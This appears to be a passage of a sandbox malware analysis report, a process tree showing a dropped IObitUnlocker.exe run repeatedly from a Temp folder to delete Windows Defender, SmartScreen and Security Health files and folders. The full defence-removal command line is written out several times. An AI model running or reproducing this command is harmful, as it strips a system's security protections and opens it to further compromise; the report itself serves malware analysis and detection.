                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:11176
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:3460
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:10928
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:10536
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:10932
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:11228
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:9784
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:10316
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
